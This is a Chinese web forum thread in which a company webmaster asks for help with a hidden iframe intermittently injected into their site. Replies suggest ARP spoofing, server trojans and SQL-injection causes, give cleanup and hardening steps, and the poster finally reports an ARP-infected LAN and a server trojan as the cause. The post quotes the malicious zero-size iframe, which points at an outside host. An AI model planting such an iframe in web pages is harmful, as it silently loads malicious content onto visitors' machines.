网站被注入 求解

我们公司的网站 
http://www.girlmen.com/注入的代码是 <iframe src=http://www.whsp.com.cn/obj/index.htm width=1 height=0></iframe> 
而且是时有时无  第一次开没有,刷新下有
   它在FF中界面不受影响 其它的都有影响已经处理过的有 1.服务器杀毒  2.数据库字段查询  3 项目文件 都没有找到
               已经的情况:服务器调试没有注入的代码 同一项目发布没有注入的代码 
求解 或是给出解决思路

解决方案 »

  1.   

    http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html
      

  2.   

    全站检索 iframe ,发现有此情况的全删除
    数据库下个存储过程,搜索有没有,有就删除
    异常排除后,把站点设置为iis的user只读,只有上传图片的地方可写
    下载几个注入工具,扫描网站有没有漏洞,并堵上
      

  3.   


    注入的代码时有时无 是不是ART挂马
      

  4.   

    估计 不是ART的  每次都有的   
      

  5.   

    服务器上 IIS调试没有问题  项目调试没有问题
    http://www.girlmen.com/EQSchoolSys/EQSchool.aspx 这个时有时无
      

  6.   

    一、分析被注入原因,并修改漏洞
     1.1检查iis日志,查看是否有异常的sql注入的url请求,如果有发现就可以知道哪里被注入了,将漏洞补上
     1.2 检查是否存在富文本编辑器漏洞如fckeditor,
     1.3检查是否存在文件上传漏洞二、清除被挂马网页:可以通过查看网页文档的修改时间来排查文档是否被修改过,并清除被挂的马,有些马可能是动态挂上的,即通过修改页面脚本来动态生成<ifram或<script等木马,也可能存在一句话木马;
    也可通过一些工具要扫描是否被挂马三、重新设置iis权限,像保存上传文件的文件夹不要给矛执行脚本的权限,网站根目录不要给矛写权限。重设数据库权限,数据库连接用户名不要使用sa,重新分配数据库登录用户名,并给它设置最低权限
      

  7.   

    这个问题我见到过 是局域网其他或者当前机子中了ARP病毒 病毒会拦截局域网的数据包 并且修改发送
      

  8.   

    并非程序漏洞 是WINDOWS漏洞 如果把系统补丁打全了可以避免  不过是治标不治本
    要治本就得找出中毒的电脑
      

  9.   

    应该是服务器中马。
    直接访问:http://61.183.15.52
    也提示有木马!
      

  10.   

    我可以肯定是电信的dns遭到挂马
      

  11.   

    已经试过了  项目浏览没有问题 IIS浏览没有问题 IE直接访问网站 有问题
      

  12.   


    问题搞定了  是局网中毒了和服务器有木马 加上google刷新 有点慢慢 所以问题处理了 还提示问题